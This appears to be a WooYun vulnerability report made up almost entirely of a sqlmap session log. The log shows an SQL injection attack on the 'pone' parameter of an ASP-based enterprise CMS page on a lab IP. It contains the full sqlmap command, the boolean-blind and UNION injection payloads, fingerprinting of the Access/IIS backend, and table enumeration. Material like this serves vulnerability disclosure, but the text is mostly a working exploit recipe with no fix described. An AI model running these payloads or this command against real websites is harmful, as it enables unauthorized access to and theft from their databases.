WooYun.org

J:\sqlmap>python sqlmap.py -u "http://192.168.56.130:8081/xz.asp?pone=3&id=9" --
tables --dbms=access
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20140918}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:42:20
[14:42:20] [INFO] testing connection to the target URL
[14:42:21] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[14:42:22] [INFO] target URL is stable
[14:42:22] [INFO] testing if GET parameter 'pone' is dynamic
[14:42:22] [WARNING] GET parameter 'pone' does not appear dynamic
[14:42:22] [WARNING] heuristic (basic) test shows that GET parameter 'pone' migh
t not be injectable
[14:42:22] [INFO] testing for SQL injection on GET parameter 'pone'
do you want to include all tests for 'Microsoft Access' extending provided level
(1) and risk (1)? [Y/n]
[14:42:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:42:25] [WARNING] reflective value(s) found and filtering out
[14:42:26] [INFO] GET parameter 'pone' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable (with --string="\u4e0b\u8f7d\u5206\u7c7b\u4e8c-
\u4e34\u6c7e\u7f51\u7ad9\u5efa\u8bbe---\u8ffd\u68a6\u5de5\u4f5c\u5ba4,\u8ffd\u68
a6\u4f01\u4e1a\u7f51\u7ad9\u7ba1\u7406\u7cfb\u7edf\uff0casp\u4f01\u4e1a\u7f51\u7
ad9\u7ba1\u7406\u7cfb\u7edf\uff0c\u901a\u7528\u4f01\u4e1a\u7f51\u7ad9\u7ba1\u740
6\u7cfb\u7edf\uff0c\u4f01\u4e1a\u5efa\u7ad9\u7684\u9996\u9009\u54c1\u724c\uff01-
http://www.zmcms.net")
[14:42:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:42:26] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[14:42:26] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[14:42:26] [INFO] target URL appears to have 9 columns in query
[14:42:28] [INFO] GET parameter 'pone' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'pone' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requ
ests:
---
Place: GET
Parameter: pone
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pone=3 AND 7765=7765&id=9
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: pone=-1872 UNION ALL SELECT NULL,CHR(113)&CHR(112)&CHR(98)&CHR(108)
&CHR(113)&CHR(78)&CHR(106)&CHR(110)&CHR(84)&CHR(83)&CHR(112)&CHR(122)&CHR(110)&C
HR(108)&CHR(66)&CHR(113)&CHR(102)&CHR(114)&CHR(118)&CHR(113),NULL,NULL,NULL,NULL
,NULL,NULL,NULL FROM MSysAccessObjects%16&id=9
---
[14:42:30] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[14:42:30] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[14:42:30] [INFO] the SQL query used returns 58 entries
Database: Microsoft_Access_masterdb
[1 table]
+-------------+
| MSysObjects |
+-------------+
[14:42:35] [INFO] fetched data logged to text files under 'C:\Users\c\.sqlmap\ou
tput\192.168.56.130'
[*] shutting down at 14:42:35